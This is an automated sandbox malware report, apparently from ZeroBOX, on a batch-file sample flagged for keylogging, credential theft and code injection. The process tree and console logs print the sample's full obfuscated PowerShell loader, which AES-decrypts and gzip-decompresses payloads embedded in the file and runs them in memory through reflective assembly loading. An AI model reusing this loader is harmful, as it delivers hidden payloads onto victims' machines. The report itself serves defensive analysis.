popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

cpp_self_SC.bat

NPKI Generic Malware Downloader Antivirus FTP DGA HTTP Socket Escalate priviledges Create Service KeyLogger Code injection P2P Internet API DNS Http API Steal credential ScreenShot Sniff Audio AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us April 12, 2023, 1:26 p.m. April 12, 2023, 1:28 p.m.
Size 377.9KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 7b99fd1109a4f8307320a92fbb237bfb
SHA256 c403661d97b505eb900a16ab16ef8ff7ef1b6c3afc71c463c2469fa0cc03c1a2
CRC32 D90D8803
ssdeep 6144:zBRZTe1Dqjw9lCjnvCC1H42WDB/QyRqKISiYPPkWB+xjlubIJXJxLt0pBp2BC18K:zJTe1yw9lCTv14vCy5p7PkU+xjQw5xL6
Yara
  • NPKI_Zero - File included NPKI

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "MJTdZEt" C:\Users\test22\AppData\Local\Temp\cpp_self_SC.bat

    1492

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\cpp_self_SC.bat

      2056

      • cpp_self_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\cpp_self_SC.bat.exe" $hoqP='MaASJPinMASJPodASJPuASJPleASJP'.Replace('ASJP', '');$icJO='LoASJPadASJP'.Replace('ASJP', '');$PTNQ='EASJPnASJPtASJPrASJPyPoASJPinASJPtASJP'.Replace('ASJP', '');$qOyZ='SASJPpliASJPtASJP'.Replace('ASJP', '');$Pdxo='CASJPrASJPeaASJPtASJPeDASJPecASJPryptASJPorASJP'.Replace('ASJP', '');$TEkt='TranASJPsfoASJPrmASJPFinaASJPlBASJPloASJPckASJP'.Replace('ASJP', '');$xFRM='FroASJPmBaASJPse6ASJP4StASJPriASJPngASJP'.Replace('ASJP', '');$cDSQ='CASJPhASJPaASJPngASJPeASJPExteASJPnsiASJPonASJP'.Replace('ASJP', '');$hMFe='FirASJPstASJP'.Replace('ASJP', '');$dBAR='GetCASJPuASJPrreASJPntASJPProASJPceASJPssASJP'.Replace('ASJP', '');$Wijw='IASJPnvASJPokASJPeASJP'.Replace('ASJP', '');$FOKd='ReASJPadASJPLASJPinASJPesASJP'.Replace('ASJP', '');function IgypD($utrtk){$NjyUn=[System.Security.Cryptography.Aes]::Create();$NjyUn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NjyUn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NjyUn.Key=[System.Convert]::$xFRM('ObPQe07WRiYWEUTOpWDEw/EZfBcGQKT9ju4qCcGJuXE=');$NjyUn.IV=[System.Convert]::$xFRM('DgAS1sFB7YAK8VQ/Y81U7Q==');$nkxgc=$NjyUn.$Pdxo();$pgtXE=$nkxgc.$TEkt($utrtk,0,$utrtk.Length);$nkxgc.Dispose();$NjyUn.Dispose();$pgtXE;}function tEuKj($utrtk){$ClWPe=New-Object System.IO.MemoryStream(,$utrtk);$JHyon=New-Object System.IO.MemoryStream;$aZrPy=New-Object System.IO.Compression.GZipStream($ClWPe,[IO.Compression.CompressionMode]::Decompress);$aZrPy.CopyTo($JHyon);$aZrPy.Dispose();$ClWPe.Dispose();$JHyon.Dispose();$JHyon.ToArray();}$pLLSf=[System.Linq.Enumerable]::$hMFe([System.IO.File]::$FOKd([System.IO.Path]::$cDSQ([System.Diagnostics.Process]::$dBAR().$hoqP.FileName, $null)));$XQVFj=$pLLSf.Substring(3).$qOyZ(':');$VsmWT=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[0])));$YKzPU=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[1])));[System.Reflection.Assembly]::$icJO([byte[]]$YKzPU).$PTNQ.$Wijw($null,$null);[System.Reflection.Assembly]::$icJO([byte[]]$VsmWT).$PTNQ.$Wijw($null,$null);

        2280

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Unexpected token '(' in expression or statement.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: At line:1 char:970
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: + $hoqP='MaASJPinMASJPodASJPuASJPleASJP'.Replace('ASJP', '');$icJO='LoASJPadASJ
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: P'.Replace('ASJP', '');$PTNQ='EASJPnASJPtASJPrASJPyPoASJPinASJPtASJP'.Replace('
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: ASJP', '');$qOyZ='SASJPpliASJPtASJP'.Replace('ASJP', '');$Pdxo='CASJPrASJPeaASJ
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: PtASJPeDASJPecASJPryptASJPorASJP'.Replace('ASJP', '');$TEkt='TranASJPsfoASJPrmA
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: SJPFinaASJPlBASJPloASJPckASJP'.Replace('ASJP', '');$xFRM='FroASJPmBaASJPse6ASJP
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: 4StASJPriASJPngASJP'.Replace('ASJP', '');$cDSQ='CASJPhASJPaASJPngASJPeASJPExteA
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: SJPnsiASJPonASJP'.Replace('ASJP', '');$hMFe='FirASJPstASJP'.Replace('ASJP', '')
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: ;$dBAR='GetCASJPuASJPrreASJPntASJPProASJPceASJPssASJP'.Replace('ASJP', '');$Wij
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: w='IASJPnvASJPokASJPeASJP'.Replace('ASJP', '');$FOKd='ReASJPadASJPLASJPinASJPes
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: ASJP'.Replace('ASJP', '');function IgypD($utrtk){$NjyUn=[System.Security.Crypto
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: graphy.Aes]::Create();$NjyUn.Mode=[System.Security.Cryptography.CipherMode]::CB
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: C;$NjyUn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NjyUn.Key=[
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: System.Convert]::$xFRM( <<<< 'ObPQe07WRiYWEUTOpWDEw/EZfBcGQKT9ju4qCcGJuXE=');$N
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: jyUn.IV=[System.Convert]::$xFRM('DgAS1sFB7YAK8VQ/Y81U7Q==');$nkxgc=$NjyUn.$Pdxo
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: ();$pgtXE=$nkxgc.$TEkt($utrtk,0,$utrtk.Length);$nkxgc.Dispose();$NjyUn.Dispose(
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: );$pgtXE;}function tEuKj($utrtk){$ClWPe=New-Object System.IO.MemoryStream(,$utr
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: tk);$JHyon=New-Object System.IO.MemoryStream;$aZrPy=New-Object System.IO.Compre
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: ssion.GZipStream($ClWPe,[IO.Compression.CompressionMode]::Decompress);$aZrPy.Co
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: pyTo($JHyon);$aZrPy.Dispose();$ClWPe.Dispose();$JHyon.Dispose();$JHyon.ToArray(
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: );}$pLLSf=[System.Linq.Enumerable]::$hMFe([System.IO.File]::$FOKd([System.IO.Pa
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: th]::$cDSQ([System.Diagnostics.Process]::$dBAR().$hoqP.FileName, $null)));$XQVF
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: j=$pLLSf.Substring(3).$qOyZ(':');$VsmWT=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[0
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: ])));$YKzPU=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[1])));[System.Reflection.Asse
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: mbly]::$icJO([byte[]]$YKzPU).$PTNQ.$Wijw($null,$null);[System.Reflection.Assemb
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: ly]::$icJO([byte[]]$VsmWT).$PTNQ.$Wijw($null,$null);
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: ecordException
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : UnexpectedToken
console_handle: 0x0000017f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043cf28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c9a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0043c9a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005ef1f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005eef30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005eef30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005eef30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005eeff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 2162688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02690000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02860000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02861000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02862000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
